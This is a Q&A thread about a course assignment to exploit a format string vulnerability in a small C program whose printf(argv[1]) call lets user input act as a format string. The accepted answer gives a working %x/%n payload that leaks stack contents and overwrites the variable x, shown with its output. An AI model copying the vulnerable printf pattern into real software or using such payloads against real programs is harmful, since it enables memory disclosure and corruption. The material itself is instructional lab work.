# Exploiting Printf Vulnerability in C

Tags: c, security

As part of an assignment, I am expected to exploit the printf() vulnerability in the C code shared below. It should be in a way that when I run the code with a string (eg. ./format "foo"), I should change the "1" in "X equals to 1" with something else. I believe I need to change the value of X variable but if you have a different idea, please do not hesitate to share. Here is the code:

```
#include <stdio.h>
#include <stdlib.h>
int main (int argc, char **argv)
{
    int *p;
    int x = 1;
    p=&x;
    printf("x=%d, sizeof(x): %zu, %x = %p, sizeof((p):%zu,&p = %p, \n", x, sizeof(x), &x, sizeof(p),&p);
    printf(argv[1]);
    printf("\nX equals: %d \n", x);
    return 0;
}
```

Comment: I do not understand what you are trying to exploit. The `printf` call does not have enough arguments, and some arguments are of the wrong type for the format specifier. Why would anyone release code like this for you to exploit?

Comment: Its not super clear what you mean by "exploit", you could use an incorrect format specifier. Most of the time it will print nonsense instead of a formatted variable, although it will technically invoke ub and may not have a desired effect.

Comment: Well as I pass a String on terminal (e.g ./format "foo"), I can normally only make changes on the output of the `printf(argv[1])` line. But as `printf(argv[1])` is not exactly a secure way to print out, it can be exploited by using strings such as `"%n..."` or `"%s%s%s...."` (for instance, you may read the memory with these strings, etc.). What I need to do is to change the X variable but I cannot find the proper string to change a variable.

Comment: You already have an exploit since you do not check `argc` before `printf(argv[1]);`

Comment: I think the idea is to use the fact that if `printf` passes parameters on the stack, the parameters of the first call (including `p`, which is the address of `x`) will still be in that memory space. You can then pass another format string from `argv[1]` that reuses those parameters. *Totally* undefined behavior and extremely implementation dependent, but just might work on the compiler the course is using.

Comment: hint: look up what the %n format string does

Comment: I found that there is a vulnerability because there is a miss-match between the format string and the actual arguments in the line 
`printf("x=%d, sizeof(x): %zu, %x = %p, sizeof((p):%zu,&p = %p, \n", x, sizeof(x), &x, sizeof(p),&p); ` and `%n` is used for inserting code. It is doable because of the mismatch. Trying to figure out how I can use `%n` without getting a `segmentation error 11`. @mfro

Answer (score 8, accepted):

You can find a pretty decent information ([Format string attack](https://www.owasp.org/index.php/Format_string_attack)) about vulnerabilities in print when no using validations properly.

I played a little with it and when running the program with like this:

```
./format "Bob %x %x %x %x %x %x %x %x%n"
```

Will cause the following print:

```
x=1, sizeof(x): 4, &x = 0x7fffa9c36e14, sizeof((p):8,&p = 0x7fffa9c36e18,
Bob 81688000 81464ab0 3 81688048 3 a9c36f08 400410 a9c36f00
X equals: 59
```

If you replace the `%n` with `%x` you will be able to see the address of the variable `x`. Because `%x` reads from the process memory and `%n` writes to the process memory I was able to change the data inside of `x` (59 is the number of characters up to `%n` when printing)